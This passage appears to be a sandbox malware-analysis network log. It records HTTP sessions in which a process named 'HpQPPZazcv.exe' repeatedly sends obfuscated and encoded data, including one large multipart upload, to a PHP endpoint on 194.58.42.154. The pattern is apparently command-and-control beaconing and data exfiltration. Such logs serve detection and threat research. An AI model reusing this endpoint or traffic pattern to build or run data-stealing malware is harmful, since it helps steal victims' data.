Aug 1, 2024 04:28:21.674571991 CEST	2512	OUT	Data Raw: 5d 54 59 53 5f 46 57 5a 5e 5a 5a 56 50 5c 50 50 55 5f 5c 5c 54 50 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]TYS_FWZ^ZZVP\PPU_\\TPZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X?5 <<_>3=>5"8?+'".#)9&483-9^/.]++
Aug 1, 2024 04:28:22.142247915 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:22.277003050 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49753	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:25.027564049 CEST	524	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----eTwOLJhoufyL2P3BNzX1CU6eJZ78WmysxB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 135542 Expect: 100-continue
Aug 1, 2024 04:28:25.395833969 CEST	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 65 54 77 4f 4c 4a 68 6f 75 66 79 4c 32 50 33 42 4e 7a 58 31 43 55 36 65 4a 5a 37 38 57 6d 79 73 78 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------eTwOLJhoufyL2P3BNzX1CU6eJZ78WmysxBContent-Disposition: form-data; name="0"Content-Type: text/plain]S\UZGW]^ZZVP^P_UW\PTPZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_
Aug 1, 2024 04:28:25.401396990 CEST	2472	OUT	Data Raw: 73 30 39 46 43 49 7a 54 78 70 76 4e 30 4d 66 6d 38 73 33 50 36 6e 4d 4a 7a 48 47 54 6b 7a 5a 79 35 2b 4f 71 53 76 45 46 36 38 47 6e 34 64 71 49 79 59 48 70 4d 45 5a 72 63 52 65 42 4e 79 75 52 4c 39 71 71 37 31 71 50 65 37 63 56 76 57 39 35 43 5a Data Ascii: s09FCIzTxpvN0Mfm8s3P6nMJzHGTkzZy5+OqSvEF68Gn4dqIyYHpMEZrcReBNyuRL9qq71qPe7cVvW95CZq6rH69ieulhX9+T5wBLeKWWD3I8hKXGxXzaMoyitYO2eorCp4MOM29RpWF/zkJ8Gu9t8o9nzQedUMhbrstrHuIg4GDy1XkZruY5HF365qXi13IxNjvL+aN/NPKEonmdCKP1p5fGPXh1vX+faGZBChEE48gxfSu9Ar
Aug 1, 2024 04:28:25.401439905 CEST	4944	OUT	Data Raw: 4a 71 6a 38 6d 34 4b 51 71 71 79 69 34 4f 51 37 49 4e 46 55 4f 51 64 42 71 54 52 6c 78 45 4f 73 41 6c 6d 69 55 72 44 49 66 35 4d 4e 59 6d 4b 57 31 63 43 37 4c 36 44 2f 32 54 75 43 5a 67 53 39 75 67 61 46 47 33 79 6d 52 65 68 6d 5a 54 54 2b 70 61 Data Ascii: Jqj8m4KQqqyi4OQ7INFUOQdBqTRlxEOsAlmiUrDIf5MNYmKW1cC7L6D/2TuCZgS9ugaFG3ymRehmZTT+pa+QmDJO47+RP+vL6mLs6da2uCzcA3qQ8xpA74D0E0omoS4mSHEBi/SAABN2MBdVyF0rNDoJRo9UQ3pnpT/UydG3C3WEeMxjqYTgnNA19UB5NHo6upyCJXwXpY0C6fIfCLNKS99hXyhKhXYk9BF6PkilKasFpgcHb89
Aug 1, 2024 04:28:25.401468992 CEST	2472	OUT	Data Raw: 4f 41 32 36 4a 4c 66 49 48 6d 54 2f 6c 6b 32 59 45 31 7a 52 32 72 68 2f 39 30 53 56 45 58 66 74 6c 38 30 41 66 66 4e 50 6c 63 79 35 74 38 38 55 79 67 6b 6b 51 49 48 35 71 48 4a 77 54 6e 75 69 6f 4b 42 65 36 75 44 74 45 78 48 49 61 52 77 64 6f 69 Data Ascii: OA26JLfIHmT/lk2YE1zR2rh/90SVEXftl80AffNPlcy5t88UygkkQIH5qHJwTnuioKBe6uDtExHIaRwdoiN/rRJjqaxm2RyguLkfnz9y7/dS9IRORtr1MVxbCPsvgPHmbAUwojqTu3EPddjaaFp1/20B3P/6brVDbA3+Gz760bZacSdTCW+YjwcbE/O1dUf6otAHUU4rhSRA0+OQWyhccHOVyCd5+IjMqg/2rOSLeGJ0ysdqCvZ
Aug 1, 2024 04:28:25.401525974 CEST	4944	OUT	Data Raw: 65 68 7a 6b 74 6e 2b 4f 67 6e 61 36 30 6c 36 6a 36 34 4f 70 4a 56 4c 34 34 7a 4f 35 67 6b 65 35 37 66 32 7a 35 4a 50 6b 44 4f 34 33 70 7a 78 35 4e 54 30 55 4b 46 61 52 31 54 7a 44 4a 54 71 4f 50 50 58 58 72 48 4d 31 53 38 32 45 6e 4e 67 2b 71 62 Data Ascii: ehzktn+Ogna60l6j64OpJVL44zO5gke57f2z5JPkDO43pzx5NT0UKFaR1TzDJTqOPPXXrHM1S82EnNg+qbO7iJ/wC4nYePPQBrbXMLOVO7ARJTNoVpvOPvywI7g36I/SYOvrxoef92zQsdGxRV/t/DGspcxvmq1gt9kM7G+VVvrZHZ5Xl4POVVXEzdMIxU2IHkW1skpeo9LVYufy7U+dmJYXrIsamhPjIi+tZeS/ssv3plV6eO2
Aug 1, 2024 04:28:25.401582003 CEST	4944	OUT	Data Raw: 4a 74 74 6a 6f 48 47 6c 6b 35 4d 2f 76 46 50 72 35 65 67 37 59 78 4a 39 44 77 34 4f 44 70 6a 7a 55 69 4e 61 79 7a 54 55 56 6a 47 44 2b 32 76 72 6c 44 53 38 63 57 74 4a 41 64 33 6d 77 68 79 53 50 33 67 37 4d 61 72 49 34 62 7a 62 55 36 47 45 6c 33 Data Ascii: JttjoHGlk5M/vFPr5eg7YxJ9Dw4ODpjzUiNayzTUVjGD+2vrlDS8cWtJAd3mwhySP3g7MarI4bzbU6GEl32lThy6kiuviz5hPD/jgRcj861r0TjOtCGX7/Z8ruiX53s8QwW+XZT8Pk8arfAlWtfQMWes3IaeIXhoPz/A2vAk+feU2foJH1fiYyetd+4EcO6RjtVBzH0vad4lq6zxY3l5/+5bmzop53T+bxqLl3+/SbDt2tr+dOE
Aug 1, 2024 04:28:25.401612043 CEST	2472	OUT	Data Raw: 68 52 51 4f 39 72 4b 50 39 70 44 53 6b 5a 49 67 5a 73 32 78 62 4b 78 74 31 56 61 32 48 58 66 32 66 6d 34 39 36 64 55 74 6d 42 54 7a 71 71 70 62 4b 39 64 49 53 73 74 65 44 37 68 74 4a 4e 70 49 44 67 31 77 6f 52 67 4c 37 5a 71 79 72 54 53 56 44 76 Data Ascii: hRQO9rKP9pDSkZIgZs2xbKxt1Va2HXf2fm496dUtmBTzqqpbK9dISsteD7htJNpIDg1woRgL7ZqyrTSVDvph8N3c6mzyGLkTd3rTrBN7zQRKUcQDkVG0oE8PqMlJ1m4FpjITj9uWp4CrQ7e8cyVkAnjJOej2UKCUntukpxAuI1NumZ1sS+ZuLHQHyVROKbKsMti4qDZ0SRWQJtx7m71JlqoIgpyDaccqelFtdUO+d+8d2/MHU8G
Aug 1, 2024 04:28:25.401639938 CEST	2472	OUT	Data Raw: 2f 4a 4a 49 45 55 76 7a 46 62 4a 6f 37 75 32 71 58 43 30 4e 6d 63 7a 36 32 49 69 37 59 44 77 77 6a 69 75 51 69 68 65 5a 6f 48 7a 65 73 32 48 51 30 4f 61 6b 64 5a 53 41 2b 2f 44 6f 44 52 76 34 45 65 6b 53 48 2f 6a 46 6a 2f 73 4f 6e 55 5a 4d 61 38 Data Ascii: /JJIEUvzFbJo7u2qXC0Nmcz62Ii7YDwwjiuQiheZoHzes2HQ0OakdZSA+/DoDRv4EekSH/jFj/sOnUZMa87X7bb8V68c1o1X/WxsD/3OyfZybZtp2DIpnnbj15+hP3/m8j5G92zLDNKkzjCxXV/HA+e/sIMuGfG59RIWp7rOC+k10pb+KSVGVO9YMYhMFyd0SjGep3W9sN7b7LeBv3qIHjvTo8Lg/hud4re9TF/Vbb1SE7FUYZ+
Aug 1, 2024 04:28:25.406544924 CEST	2472	OUT	Data Raw: 68 35 4b 2f 48 41 46 45 62 65 6b 36 4c 74 55 66 36 7a 42 63 75 64 4e 6c 37 44 67 36 69 4d 75 61 34 6c 6e 77 63 57 76 38 34 6e 63 45 78 77 4e 70 78 35 47 50 36 72 78 76 4e 38 51 30 70 46 72 63 6d 59 41 39 63 54 69 57 45 2b 5a 54 75 56 77 57 63 57 Data Ascii: h5K/HAFEbek6LtUf6zBcudNl7Dg6iMua4lnwcWv84ncExwNpx5GP6rxvN8Q0pFrcmYA9cTiWE+ZTuVwWcWEylJ0yo75G7OGLkDtbj8BxmlgAR0F7UcNS7bjoy9tjX0wt9cWQH0hRiq2vF14sKcpzxXb0iXXcHjblDHG2UFYXoEj6VEBCh/uWSxr9LmsQ5WHBY2lXo2q/vy1RuvvnSSL4m0mh4PQftV+JGL0gJkyhSRfJoFiH2eP
Aug 1, 2024 04:28:25.406925917 CEST	9888	OUT	Data Raw: 67 6b 76 4e 42 45 55 65 39 53 73 5a 6d 62 67 73 79 34 4f 41 7a 50 49 77 74 4e 42 44 43 4d 75 62 69 49 44 64 5a 53 6c 73 72 49 70 38 66 38 61 53 57 44 6b 55 6e 44 55 4c 49 63 57 6c 61 55 37 74 6b 45 78 37 35 53 44 49 4c 46 39 2b 53 69 6a 58 4f 5a Data Ascii: gkvNBEUe9SsZmbgsy4OAzPIwtNBDCMubiIDdZSlsrIp8f8aSWDkUnDULIcWlaU7tkEx75SDILF9+SijXOZO9ehVMFCri0fjbnj3rzBIbnWfD1w8hAv/3ZdD/dFxBfz/5LZ6QMpz7j4BB9Zd8AREJIbzKQpQJWf9fo/wsBUpCqJqTn/HliSdL+PdW+sDfM6qfSSSFElIe4B8/QluMOC8+CNbpAekCOUH/9d69cog7g8UQVZs0zpT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:25.691045046 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:26.052145004 CEST	2512	OUT	Data Raw: 58 5f 5c 53 5f 42 57 53 5e 5a 5a 56 50 5c 50 5f 55 54 5c 5f 54 5c 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X_\S_BWS^ZZVP\P_UT\_T\ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%^<39U#/')%=<:!?(_34U+*"4+'=9^/.]++
Aug 1, 2024 04:28:26.481410027 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:26.615425110 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:27.567828894 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1996 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:27.608748913 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:27.955836058 CEST	2512	OUT	Data Raw: 5d 55 59 53 5f 45 52 5e 5e 5a 5a 56 50 59 50 58 55 5e 5c 5d 54 58 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]UYS_ER^^ZZVPYPXU^\]TXZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%?)S ,*#==9W"+ +3=&70(Z#$'3-9^/.]+
Aug 1, 2024 04:28:28.414266109 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:28.547703028 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:29.038067102 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:28:29.393357992 CEST	2512	OUT	Data Raw: 58 51 5c 50 5f 47 57 5f 5e 5a 5a 56 50 57 50 59 55 50 5c 5d 54 50 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XQ\P_GW_^ZZVPWPYUP\]TPZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X)367<,]*3.><.5;<<0=5U7,R()5[ 4+$9^/.]+
Aug 1, 2024 04:28:29.859499931 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:29.991353989 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:31.011619091 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:31.362543106 CEST	2512	OUT	Data Raw: 58 51 5c 54 5f 45 57 5d 5e 5a 5a 56 50 57 50 5f 55 57 5c 50 54 5f 5a 5a 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XQ\T_EW]^ZZVPWP_UW\PT_ZZYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Y+0!R#/$_* "(,)#+0<,0.)P#;+:!7$7&=9^/.]+
Aug 1, 2024 04:28:31.825311899 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:31.957824945 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:32.084060907 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2504 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:32.440689087 CEST	2504	OUT	Data Raw: 5d 55 5c 51 5a 41 57 5a 5e 5a 5a 56 50 5e 50 51 55 55 5c 5b 54 51 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]U\QZAWZ^ZZVP^PQUU\[TQZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Z<0=W4<(Y?#">66;](;X%=%V >U< 43-9^/.]+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:32.821604967 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1960 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:33.285335064 CEST	1960	OUT	Data Raw: 5d 51 5c 53 5a 44 57 5e 5e 5a 5a 56 50 5e 50 58 55 53 5c 51 54 5f 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]Q\SZDW^^ZZVP^PXUS\QT_Z\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&+39U7<7=#_),1#+Y?;+Z$%V#.$(* ';'-9^/.]+'
Aug 1, 2024 04:28:33.612303019 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:33.790720940 CEST	380	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 53 36 1f 21 58 37 2d 30 55 3a 04 21 04 2b 23 2e 10 3d 05 20 59 27 1d 05 53 2b 3e 27 02 3d 3f 28 5b 32 3d 20 57 22 2c 21 12 29 36 2a 46 0c 10 25 59 28 13 20 09 31 01 28 0f 2d 30 31 47 26 07 37 5f 36 3f 32 50 20 5d 24 16 2b 06 3c 50 24 2a 33 08 39 58 25 06 25 51 29 01 20 35 2a 54 02 15 27 51 3d 3d 21 1d 24 22 12 17 25 2c 19 1f 26 10 21 10 22 2f 31 11 37 29 31 02 33 38 01 1b 3c 2e 0a 51 26 06 28 5f 3d 57 3e 09 22 17 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &S6!X7-0U:!+#.= Y'S+>'=?([2= W",!)6F%Y( 1(-01G&7_6?2P ]$+<P$39X%%Q) 5T'Q==!$"%,&!"/17)138<.Q&(_=W>" P,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49761	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:34.215106010 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:28:34.565407038 CEST	2512	OUT	Data Raw: 5d 56 59 52 5f 46 57 58 5e 5a 5a 56 50 56 50 5d 55 5e 5c 59 54 5c 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]VYR_FWX^ZZVPVP]U^\YT\ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%^< "#7=3)),1W60(+$0 ,S+:!"7'&=9^/.]+
Aug 1, 2024 04:28:35.019808054 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:35.197246075 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49762	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:35.326060057 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:35.674948931 CEST	2512	OUT	Data Raw: 5d 55 59 53 5a 46 57 5a 5e 5a 5a 56 50 5c 50 59 55 53 5c 50 54 58 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]UYSZFWZ^ZZVP\PYUS\PTXZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%<54?4=_(?-6+#_+;Z0."#>8U+)>7,3=9^/.]++
Aug 1, 2024 04:28:36.118098021 CEST	25	IN	HTTP/1.1 100 Continue
